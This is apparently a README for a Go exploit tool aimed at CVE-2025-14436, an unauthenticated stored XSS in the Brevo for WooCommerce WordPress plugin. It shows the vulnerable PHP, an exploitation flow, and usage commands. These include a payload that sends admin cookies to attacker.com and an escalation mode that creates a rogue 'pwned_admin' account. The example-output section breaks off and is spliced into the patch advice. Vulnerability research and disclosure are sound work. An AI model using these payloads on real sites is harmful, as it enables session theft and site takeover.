## https://sploitus.com/exploit?id=135EC767-1ACB-5B97-B7CF-1083FFC5AEE2
# CVE-2025-14436
## Brevo for WooCommerce - Unauthenticated Stored Cross-Site Scripting
**Author:** MoritakaAz
---
## Vulnerability Information
| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2025-14436 |
| **Plugin** | Brevo for WooCommerce |
| **Affected Versions** | โค 4.0.49 |
| **Vulnerability Type** | Unauthenticated Stored Cross-Site Scripting (XSS) |
| **Severity** | High |
## Description
The Brevo for WooCommerce plugin is vulnerable to Stored Cross-Site Scripting via the `user_connection_id` parameter in all versions up to, and including, 4.0.49 due to insufficient input sanitization and output escaping.
This makes it possible for **unauthenticated attackers** to inject arbitrary web scripts in pages that will execute whenever a user (typically an admin) accesses an injected page.
## Root Cause Analysis
The vulnerable code is located in `woocommerce-sendinblue.php`:
```php
// Line ~164-188 - Vulnerable callback handler
function sendinblue_woocommerce_callback() {
$pageNameVar = get_query_var('pagename');
if ($pageNameVar == 'sendinblue-callback') {
// No authentication check!
$user_connection_id = filter_input(INPUT_POST, 'user_connection_id');
if(empty($user_connection_id)) {
parse_str($query_string, $queries);
$user_connection_id = $queries['user_connection_id'];
}
if(isset($user_connection_id) && !empty($user_connection_id)) {
// โ ๏ธ VULNERABLE: No sanitization before storing!
update_option(SENDINBLUE_WC_USER_CONNECTION_ID, $user_connection_id);
}
}
}
```
The value is then output in `src/views/admin_menus.php` (line ~728) without proper escaping when admin visits the plugin settings page.
## Exploitation Flow
```mermaid
flowchart TD
A["Attacker sends POST/GET request to/index.php?pagename=sendinblue-callback"] --> B["Parameter: user_connection_id=<script>...</script>"]
B --> C{"Callback handler checkspagename == 'sendinblue-callback'?"}
C -->|Yes| D["update_option() stores payloadโ ๏ธ NO SANITIZATION!"]
D --> E["Payload stored in wp_options table"]
E --> F["Admin visits /wp-admin/admin.php?page=sendinblue"]
F --> G["admin_menus.php outputs user_connection_idโ ๏ธ NO ESCAPING!"]
G --> H["XSS payload executes in admin's browser!โ EXPLOITED!"]
style D fill:#ff6b6b,stroke:#c92a2a,color:#fff
style G fill:#ff6b6b,stroke:#c92a2a,color:#fff
style H fill:#51cf66,stroke:#2f9e44,color:#fff
```
## Prerequisites
- Target must have Brevo for WooCommerce plugin installed and activated (version โค 4.0.49)
- No authentication required for exploitation
- XSS triggers when any admin visits the plugin settings page
## Build
```bash
go build -o CVE-2025-14436.exe main.go
```
## Usage
### Inject Default XSS Alert
```bash
.\CVE-2025-14436.exe -u http://target.com
```
### Inject Custom Payload
```bash
.\CVE-2025-14436.exe -u http://target.com -p "fetch('http://attacker.com/steal?c='+document.cookie)"
```
### Check Plugin Only
```bash
.\CVE-2025-14436.exe -u http://target.com --check-only
```
## Options
| Argument | Description |
|----------|-------------|
| `-u` | Target WordPress URL (required) |
| `-p` | Custom XSS payload to inject |
| `--escalate` | Use admin user creation payload |
| `--admin-user` | Username for new admin (default: `pwned_admin`) |
| `--admin-pass` | Password for new admin (default: `Pwned123!@#`) |
| `--admin-email` | Email for new admin (default: `pwned@evil.com`) |
| `--check-only` | Only check if plugin is active, do not exploit |
| `--timeout` | Request timeout in seconds (default: 30) |
## Example Output (Escalation Mode)
```
.\CVE-2025-14436.exe -u http://target.com --escalate
>> [ ONLINE ]
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2025-14436 - Brevo for WooCommerce Stored XSS โ
โ Affected: Brevo for WooCommerce โ ๏ธ **IMPORTANT**: Update Brevo for WooCommerce plugin to version 4.0.50 or later where the vulnerability has been patched with proper input sanitization using `sanitize_text_field()` and output escaping using `esc_attr()`.
## References
- [Changeset 3434903 (Fix)](https://plugins.trac.wordpress.org/changeset/3434903/woocommerce-sendinblue-newsletter-subscription)
- [admin_menus.php Source](https://plugins.trac.wordpress.org/browser/woocommerce-sendinblue-newsletter-subscription/trunk/src/views/admin_menus.php#L728)
- [admin-manager.php Source](https://plugins.trac.wordpress.org/browser/woocommerce-sendinblue-newsletter-subscription/trunk/src/managers/admin-manager.php#L59)
- [woocommerce-sendinblue.php Source](https://plugins.trac.wordpress.org/browser/woocommerce-sendinblue-newsletter-subscription/trunk/woocommerce-sendinblue.php#L164)
## Disclaimer
This tool is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Use responsibly.
## Author
**MoritakaAz**